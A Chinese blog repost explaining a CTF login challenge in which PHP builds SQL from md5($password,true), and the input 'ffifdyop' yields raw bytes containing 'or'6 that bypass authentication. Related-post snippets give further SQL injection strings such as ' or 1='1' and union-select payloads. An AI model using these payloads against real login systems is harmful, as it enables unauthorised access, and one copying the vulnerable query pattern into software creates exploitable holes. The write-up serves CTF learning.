php中md5(密码)注入问题

最新推荐文章于 2023-04-09 20:48:22 发布
最新推荐文章于 2023-04-09 20:48:22 发布
阅读量437 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/storyline/articles/8627890.html
版权
<!DOCTYPE html>
 <html lang="en">
 <head>
 <meta charset="UTF-8">
 <title>Document</title>
 </head>
 <body style="background-color: #999">
 <div style="position:relative;margin:0 auto;width:300px;height:200px;padding-top:100px;font-size:20px;">
 <form action="" method="post">
 <table>
 <tr>
 请用管理员密码进行登录~~
 </tr>
 <tr>
 <td>密码:</td><td><input type="text" name='password'></td>
 </tr>
 <tr>
 <td><input type="submit" name='submit' style="margin-left:30px;"></td>
 </tr>
 </table>
 </form>
 密码错误! </div>
 <!-- $password=$_POST['password'];
  $sql = "SELECT * FROM admin WHERE username = 'admin' and password = '".md5($password,true)."'";
  $result=mysqli_query($link,$sql);
  if(mysqli_num_rows($result)>0){
  echo 'flag is :'.$flag;
  }
  else{
  echo '密码错误!';
  } -->
 </body>
 </html>

上面是源码,问题就在于什么样的密码md5()加密过后,函数会自动hex处理后包含'or'等字符串

$sql="select password from users where password=''or'<xxx>'" 

提供一个现成字符串:

提供一个字符串:ffifdyop

md5后,276f722736c95d99e921722cf9ed621c

再转成字符串: 'or'6<其他字符>

 

转载于:https://www.cnblogs.com/storyline/articles/8627890.html

ariel0924
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Raw MD5 Hash引发的注入
qq_37466661的博客
08-29 281
md5 字符逃逸 注入
php密码注入,php下的SQL注入万能用户名和密码
weixin_39661353的博客
03-09 557
1.针对有单引号的情况 :万能密码 :select * from users where username='xxxx' and password='xxxxxx' or 1='1';万能用户名 :select * from users where username='xxxx' union select * from users/* and password='xxxxx';防止第一种万能密...
phpmd5
suxiaxuhuanhuan的专栏
11-07 471
对于我们程序原来说,没有什么比做一个安全无漏洞的程序更重要了,一说到安全问题无疑的就会想到密码,在一个网站里有管理员密码,有会员密码等等。这些密码都 是经过MD5加密的,有的时候能过sql注入得到这个数值,可以破解出来你的密码,这样就很不安全了,下面我来介绍一下我在程序开发过程密码处理经验。 第一种方法 先进行字符串的md5转义,好多新的程序员,都是做了这一步,就直接保存到了自己的数据库
php密码注入,一个PHP登陆注入小示例解决方案
weixin_42298382的博客
03-09 328
一个PHP登陆注入小示例在学学习PHP的过程肯定会听说过SQL注入,简单的讲就是利用后台的SQL代码漏洞来进行一些非法的操作。比如:利用后台代码的漏洞来登陆,用户不用知道真实的用户名和密码也能通过表单提交数据来登陆后台成功。我们拿一个用户验证的例子,首先建立一个数据库和一个数据表并插入一条记录,如下:CREATE TABLE `user` (`userid` int(11) NOT NULL a...
注入所有php页面 $md5,PHP-MD5加密研究
weixin_33759613的博客
03-17 124
md5(string,raw);参数描述string必需。规定要计算的字符串。raw可选。规定十六进制或二进制输出格式:TRUE - 原始 16 字符二进制格式; FALSE - 默认。32 字符十六进制数;接口的签名验证:function verify_app_key(){$request = $GLOBALS['context']->request;$db = $GLOBALS['con...
php防止SQL注入详解及防范
12-19
**密码安全**:在存储密码时,不应仅使用MD5哈希,因为其已知的弱点。更安全的方法是使用更强大的哈希算法,如bcrypt或scrypt,并加入加盐(salt)过程,增加破解难度。 总结,防止SQL注入需要综合运用数据过滤、...
PHP实例开发源码—MD5在线加密工具 php版.zip
11-11
3. 安全考虑:在实际应用,需要注意防止SQL注入等安全问题,对用户输入进行适当的过滤和转义。 4. 响应格式:为了适应在线工具的需求,可能还需要将结果以JSON或其他格式返回,便于前端展示或进一步处理。 总结...
PHP 发送电子邮件详解.md
最新发布
06-13
2. **安全性问题**: 使用`mail()`函数发送邮件容易受到注入攻击。为了安全起见,应使用预处理或其他手段清理用户输入。 3. **功能有限**: `mail()`函数的功能相对有限,不支持复杂的邮件功能,比如HTML格式的邮件...
php的登陆login
10-31
然后,使用MD5算法对密码进行加密处理,以增加安全性: ```php $password = md5($password); ``` 之后构造SQL查询语句,从数据库查找对应的用户记录: ```php $SQL = "SELECT UserName, UserType, UserPass ...
基于MD5和Session的PHP安全防范.pdf
01-05
PHP编程,主要体现在MD5()函数的使用上,主要是对用户名或密码通过MD5算法生成哈希值,从而提高安全性。 Session劫持是一种比较复杂的攻击方法,目前,在防XSS攻击、SQL注入漏洞攻击以及源码泄露等方面采取了...
MD5哈希注入
qq_38486516的博客
09-11 734
当一个网站的密码加密采用的MD5算法时,可以用此方法绕过身份验证。 关键点:找到一个字符串,用MD5哈希后,输出的字符串形如'string1'='string2' 原理 pass='string1'='string2' 执行后 0=‘string2’ 由于0为double类型,故string2被强制转换为double。 即0=0,结果为 1  暴力攻击MD5原始输出 不停的循环,...
PHP的sql注入密码md5加密的)
少年,不酷不帅
06-21 2637
2018年6月20日记录: 在实验吧做了一道关于后台登陆的题目,之前自己对php注入方面认识的不是很好,所以一直对注入这方面谈虎色变,今天做了一下,其实自己好好分析整个过程,发现并不是特别难的,难得只是不敢动手去做: 我看到这个问题的时候一看网址: http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php ```没有文件包含的意思...
sql注入md5($password,true)
热门推荐
March97的博客
07-27 2万+
       前几天做了一道CTF的题目,是在”实验吧“的一道简单的web题目,当然这道题目很多人都解出来了,因为它的.php文件名就是答案。        他的网页链接里面的php文件名就是’ffifdyop.php‘。          上面的’ffifdyop‘就是我们要输入的密码。哦,忘了介绍,这道题目只需要表单提交密码。       当然如果直接输入ffifdyop,提交后就能出...
Jarvis OJ–Login 透过MD5()下的SQL注入学习MD5加密
超人学飞的日子
07-01 386
遇到一道CTF题目:http://web.jarvisoj.com:32772/找到了这个题目最早出现的地方和原理解释:http://cvk.posthaven.com/sql-injection-with-raw-md5-hashes哎,都是8年前的题目了,感觉自己进展好慢。看解释原理也不复杂,就是MD5()函数参数为true时,输出形式为原始二进制格式,如果,找到一个字符串MD5后得到的原始...
php怎么注入,php注入方法集锦
weixin_36119965的博客
03-11 521
'%23'andpassWord='mypassid=-1unionselect1,1,1id=-1unionselectchar(97),char(97),char(97)id=1unionselect1,1,1frommembersid=1unionselect1,1,1fromadminid=1unionselect1,1,1fromuserus...
php存储MD5加密密码并验证
你,若盛开的专栏
02-18 1557
开启命令行交互模式,进入php目录,执行 php -a 后执行 echo md5('需要加密的内容'); 如下图,得到,加密后的密文 复制密文,到对应数据库的password密码字段,更新信息为加密后的密码信息 进行得到的密码值与用户输入的密码md5加密值进行匹配 if($user['password']!==md5($password)){ $GLOBALS['message']...
php密码注入,php防止sql注入之万能密码以及防范
weixin_32252271的博客
03-09 493
说什么叫sql注入呢?就是在登录、注册、input输入一些影响sql语句的代码导致你的sql语句出现问题,比如说这个问题:select * from web_manage where username='xxx' and pass='ddd' or '1'所有的sql注入或攻击就是破坏原有的sql语句,然后执行or 这样就可以得到数据了,犹如上面截图所示。万能用户名看看是怎么回事:我们还是以登...
BUUCTF-MD5强弱比较-MD5()的万能密码-tornado框架注入-文电码
m0_64180167的博客
04-09 870
第六周 第三次。
clickhouse用户配置文件详解
lichunliang的博客
03-30 1万+
同时发布于 schnappi618‘s blog 参考网页: clickhouse官方文档 clickhouse配置文件参数 ​ ClickHouse的用户及访问权限控制均可由配置文件直接进行标准化配置,一般由user.xml文件设置,该文件名在/etc/clickhouse-server/config.xml修改,详情可参考clickhouse-server配置文件详解,若需要对某一个用...
MetInfo 7.5.0 后台安全审计:SQL注入MD5弱类型比较分析
在本文,我们将深入探讨针对MetInfo 7.5.0 CMS的两个关键安全问题:后台SQL注入MD5弱类型比较。MetInfo是一款企业网站管理系统,其在特定版本存在漏洞,可能导致数据泄露、系统权限篡改等严重后果。 首先,让...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值